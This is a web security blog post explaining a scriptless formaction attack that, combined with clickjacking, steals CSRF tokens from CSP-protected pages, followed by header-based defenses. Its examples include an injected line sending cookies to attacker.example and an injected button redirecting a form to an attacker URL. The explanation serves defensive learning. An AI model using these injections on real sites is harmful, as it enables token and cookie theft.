Today on HackerKast, Matt and I discussed something called a Formaction Scriptless Attack. Content Security Policy (CSP) has put a big theoretical dent in cross-site scripting. I say theoretical because relatively few sites are taking advantage of it yet; but even when it is implemented to prevent JavaScript from loading on the page, that doesn’t necessarily remove the possibility of attack via HTML injection.

For example, let’s say a site has CSP set up to prevent inline and remote JavaScript from loading, using the nonce feature, which requires every script tag to include the nonce before it will run. The nonce is probably derived from some locally known secret, XOR’d with the user’s credential or something similar. Whatever the case, the attacker doesn’t know the CSP nonce. But what the attacker really wants to do is submit some form. Now, the form itself might protect itself in a different way, using a server-generated nonce (a second one) to prevent cross-site request forgeries. Barring side-channel attacks, MitM attacks or attacks against the server itself, it seems like this might stop the attacker in their tracks.
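As a sketch, such a nonce-based policy might look like the following (the header value, nonce and function names are illustrative, not taken from the show):

```html
<!-- Response header (illustrative):
     Content-Security-Policy: script-src 'nonce-R4nd0mV4lu3' -->

<!-- Allowed: this script carries the nonce that matches the header -->
<script nonce="R4nd0mV4lu3">initApp();</script>

<!-- Blocked: an injected script has no way to guess the nonce -->
<script>document.location='https://attacker.example/?c='+document.cookie;</script>
```

The browser refuses to execute any script whose nonce attribute doesn’t match the value in the policy, which is why plain script injection gets the attacker nowhere here.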

HTML5 to the rescue! Let’s say the form has an id set of id="form1". HTML5 has a feature where any input field anywhere on the page (yes, even outside of the form block) can declare that it belongs to any form using the “form” attribute (e.g. form="form1"). That alone is somewhat bad, because perhaps I can include an extra form field and make the user do something they didn’t mean to do. But worse yet, HTML5 also has an attribute called formaction, which allows me to change the location to which the form is submitted.
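A minimal sketch of the two features together (element names, token and URLs are illustrative):

```html
<!-- The legitimate form, protected by a server-generated CSRF token -->
<form id="form1" action="/transfer" method="POST">
  <input type="hidden" name="csrf_token" value="(secret nonce)">
  <input type="submit" value="Transfer">
</form>

<!-- Injected markup, anywhere else on the page, no JavaScript required:
     "form" joins the button to form1; "formaction" overrides where
     the whole form (CSRF token included) gets submitted -->
<input type="submit" form="form1"
       formaction="https://attacker.example/steal"
       value="Click me!">
```

Note that nothing in the injected markup is a script, so a script-only CSP policy never gets a say in the matter.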

So if the attacker injects an input field that associates itself with the form containing the secret nonce, and also carries a formaction attribute pointing the form at the attacker’s website, it’s pretty much game over once the user clicks that button. So now the trick is to get the victim to click on the button. Oh, if only there were a way to get people to click on arbitrary places on a page from another domain… oh wait! Clickjacking!

So if the site is using CSP but not X-Frame-Options or similar techniques to prevent the site from being framed, the attacker can frame the page and force the user to click the evil button, whose formaction points the form back to the attacker’s site. The attacker then takes that nonce, creates a page that automatically uses it, and forces a CSRF request with the secret nonce. So much for CSRF protection! Here is the original vulnerable page and here is the clickjacked version of it with semi-opacity enabled to make it easier to see (tested in Firefox only).
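The framing defense amounts to a single response header; a minimal sketch:

```http
X-Frame-Options: DENY
```

DENY refuses all framing; SAMEORIGIN is the common alternative when a site legitimately frames its own pages, and it still blocks the cross-domain clickjacking scenario described above.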

Scriptless attacks aren’t new; Mario Heiderich, for example, has been working on them for years. But they are deadly. It’s not quite the same thing as a cross-domain read in this case, but it has the same effect: allowing the attacker to read information from the target domain for use in an attack. I highly recommend using X-Frame-Options on all your pages, but that only stops one form of the attack; it’s still possible to social engineer people, and so on. Why devs need to associate input fields with forms outside of the form block is still a bit of a mystery to me, and why they need to change the form action after the fact, even overriding the original location, is also a puzzle. But with every new feature comes a new way to abuse it. HTML5 is an interesting beast, that’s for sure!

Update: As mentioned on Twitter, you can use CSP’s form-action directive to block formaction, but you have to set it explicitly or the attack will still work even alongside other CSP rules. You can also do the equivalent of X-Frame-Options in CSP, via the frame-ancestors directive. So a properly configured CSP might actually save you – very cool!
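Putting the pieces together, a policy covering all three angles might look like this (the nonce value is illustrative):

```http
Content-Security-Policy: script-src 'nonce-R4nd0mV4lu3'; form-action 'self'; frame-ancestors 'none'
```

Here form-action 'self' restricts where forms may be submitted, formaction overrides included, to the page’s own origin, and frame-ancestors 'none' is the CSP equivalent of X-Frame-Options: DENY.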